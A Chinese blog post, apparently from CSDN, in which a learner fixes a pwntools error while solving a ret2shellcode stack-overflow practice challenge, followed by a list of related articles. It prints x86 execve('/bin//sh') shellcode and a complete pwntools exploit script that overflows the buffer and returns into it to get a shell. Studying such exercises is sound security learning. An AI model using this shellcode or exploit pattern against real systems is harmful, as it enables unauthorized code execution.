KeyError: ‘i386/linux/syscalls/execve.asm‘

已于 2022-06-21 10:41:40 修改
阅读量188 收藏 1
点赞数
分类专栏: pwn 文章标签: 其他
于 2022-06-21 10:35:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45862829/article/details/125382193
版权

自学栈溢出漏洞碰到个问题记录一下。从网上下载shellcode源码出现这个报错,错误提示一堆。
在这里插入图片描述
有一个关键错误,显示有asm,asm是汇编,在脚本中生成汇编的是asm(shellcraft.sh())这个函数,此函数会生成shellcode,将shellcode写入栈中等到ret时getshell,听大佬说shellcode也可以自己写,如果你头铁的话。合理猜想此函数有问题

"\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"

换上以后错误正常了
在这里插入图片描述

这种问题其实已经出现过,原因是字符串不能与字节连接,前面是字符串,后面是字节。在网上找到此解决方法,在a前面加b(b似乎是一个字符串转byte的转换)

改了之后依旧有其他的错误,在排查的时候突然想到既然b像是字符转换,刚刚输进去的汇编也是字符串,我只转换了用于补充无用栈的字符串,汇编还没转换,在汇编前加b
在这里插入图片描述
可以显示id等终端命令,证明getshell成功
开心,终于解决了。
注意,这里还有字节警告,没有继续追究下去,有知道的伙伴滴滴一下。
完整脚本

from pwn import *
p = process("./ret2shellcode")
buf2_addr = 0x0804A080
sc =b"\x31\xc0\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xb0\x0b\xcd\x80"
payload = sc.ljust(0x70,b"a") + p32(buf2_addr)
p.sendlineafter("No system for you this time !!!\n",payload)
p.interactive()
kizo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux环境下shellcode的编写:32位和64位
lifanxin的博客
12-10 4318
linux环境下shellcode的编写shellcode的理解使用pwntools工具编写自己实现更精炼的32位shellcode64位shellcode shellcode的理解   我们在做pwn的时候经常需要使用shellcode来获取到flag,那么shellcode如何理解,简单一句话就是:获取到shellcode就是shellcode。   在漏洞利用过程时,我们将精心编制好的shellcode通过有问题的程序写入到内存中,然后执行。该shellcode对应的c语言代码一般为: system
【Error】macOS使用pwntools asm报错
think_ycx的专栏
03-23 1653
错误描述 昨天下午在macOS上用pwntools 的asm时遇到了错误,但是在ubuntu 16.04的docker上用没问题。具体来看一下报错log: 以context.arch='i386'为例: [ERROR] There was an error running ['/usr/local/bin/i386-unknown-linux-gnu-as', '-64', '-o', '...
Shellcode入门
weixin_30279751的博客
02-28 347
Shellcode入门 一、shellcode基础知识   Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。另外,Shellcode一般是作为数据发送给受攻击服务器的。 Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着...
shellcode编写32位(Linux)
helloworlddm的博客
06-06 1312
系统调用 shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。 那么为什么要写shellcode呢?因为我们要让目标程序以不同于设计者预期的方式运行,而操作的程序的方法之一就是强制它产生系统调用(system,call,syscall)。通过系统调用,你可以直接访问系统内核。 在Linux里有两个方法来执行系统调用,间接的方法是c函数包装(libc),直接的方法是用汇编指令(通过把适当的参数加载到寄存器,然后调用int 0x
进程调度之 4:系统调用execve
weixin_34240657的博客
07-15 149
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux测试项目http://linux-test-project.github。io / - linux测试项目/ ltp
01-27
Linux Test Project Linux Test Project is a joint project started by SGI, OSDL and Bull developed and maintained by IBM, Cisco, Fujitsu, SUSE, Red Hat, Oracle and others. The project goal is to deliver...
linux.rar_Linux/Unix编程_Unix_Linux_
08-11
8. **系统调用接口**:查看syscalls.h头文件,理解系统调用的工作流程。 9. **模块编程**:如何编写和加载内核模块,以及模块的生命周期管理。 10. **调试技术**:使用gdb调试用户空间程序,使用kdb或SystemTap...
daima.rar_Linux/Unix编程_Unix_Linux_
08-12
4. **更新头文件**:在`include/linux/syscalls.h`或特定架构的syscalls.h文件中,添加新系统调用的声明。 5. **重新编译和安装内核**:执行`make`, `make modules_install`, `make install`等命令来编译、安装新...
nxdkn.rar_Linux/Unix编程_Unix_Linux_
08-11
标题"nxdkn.rar_Linux/Unix编程_Unix_Linux_"表明这是一个与Linux和Unix系统编程相关的资源包,而描述中的"EraseConfig handling functions for Linux v2.13.6."则暗示了这个包可能包含了针对特定Linux内核版本(v...
9850.rar_Linux/Unix编程_C/C++_
08-09
在C/C++中,通过系统调用接口(如`syscalls.h`头文件)来访问内核服务,例如创建进程(`fork()`, `execve()`)、读写文件(`read()`, `write()`)以及网络通信(`socket()`, `connect()`)等。 2. **文件I/O**:在...
Linux内核源码阅读之系统调用execve()
刘洋_heaven的博客
05-20 3056
asmlinkage int sys_execve(struct pt_regs regs)前言sys_execve()根据参数中指定的二进制文件路径,执行相应的二进制文件。我们可能会疑惑,参数中是一个pt_regs结构,哪里有文件路径?事实上,系统调用也属于中断,而对于系统调用,会将参数地址保存到指定寄存器中,这一事件发生的时间点是已经进入execve()代码,但是还未通过int 0x80中断真...
Ubuntu18.04下编译Linux0.12笔记(编译+调试学习1)
qq_42138566的博客
05-02 5264
1.asm指令 GCC中基本的内联汇编:asm____volatile(“InstructionList”); asm( “movl $1,%eax\r\t” “xor %ebx,%ebx\r\t” “int $0x80” ); 带有C/C++表达式的内联汇编: asm volatile(“InstructionList” :Output :Input :Clobber/Modify); 这4个部...
linux 内核编译错误的原因
热门推荐
wjw7869的专栏
11-05 1万+
 直接编译centos 7 内核目录下的代码出现如下错误: root@localhost 3.10.0-123.el7.x86_64]# make make[1]: *** No rule to make target `/usr/src/kernels/3.10.0-123.el7.x86_64/arch/x86/syscalls/syscall_32.tbl', needed
攻防世界PWN新手区WP
weixin_45461609的博客
02-23 1601
攻防世界PWNget shellwhen did you bornhello_pwnlevel2待更新 get shell nc + 地址 直接连接cat flag when did you born 运行一遍,报错,段错误,栈溢出 拖进IDA 可以观察到当v5==1926的时候就会cat flag 但是当v5 == 1926 的时候又会报错 观察到这里还有一个v4而且是栈溢出的点 不妨点进去...
shellcode学习
weixin_52878095的博客
03-12 4829
一道题目 最近在buu上面刷题的时候发现了一道题目 ciscn_2019_s_9 ,这道题目需要我们自己编写 shellcode ,以前 shellcode 都是从 pwntools 或者是msf里面直接生成的,所以借此机会来学习一下 shellcode 的编写 我们先检查一下附件的保护机制 ,啥保护也没开,所以我们可以直接在栈上面构造shellcode然后执行 丢到IDA里面看一下,这里变量s的栈空间只有.0x20大小,而fgets函数可以读入50即0x32,所以存在栈溢出 我们看一下 pwntool
记一次five熬夜重装pwntools
Ph4ntom的一亩三分地
12-22 442
今天是个好日子,今天是12.21,冬至 今天不是好日子,做一道简单题的时候发现pwntools没装好呜呜呜 这是一道基础的ret2shellcode,但是也不会做的我直奔wp去抄exp from pwn import * p = remote('pwn2.jarvisoj.com', 9877) #p = process("./level1") #接收从下标为第14位到倒数第二位的字符串 text = p.recvline()[14:-2] print text[14:-2] #将text字符串通过in
32位 shell.efi x86_shellcode编写-Linux(32位)
weixin_35860804的博客
01-26 558
系统调用shellcode是一组可注入的指令,可以在被攻击的程序中运行。由于shellcode要直接操作寄存器和函数,所以必须是十六进制的形式。那么为什么要写shellcode呢?因为我们要让目标程序以不同于设计者预期的方式运行,而操作的程序的方法之一就是强制它产生系统调用(system,call,syscall)。通过系统调用,你可以直接访问系统内核。在Linux里有两个方法来执行系统调用,间接...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 5266
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 3816
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
请扮演一个Linux Terminal。我的第一条命令是:/include/linux/syscalls.h
最新发布
03-13
对于你的第一个命令,我可以告诉你,/include/linux/syscalls.h是一个系统调用头文件,它包含了Linux内核中所有的系统调用函数的声明。这个头文件通常被C程序员用来编写系统级别的程序。如果你想了解更多关于系统...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值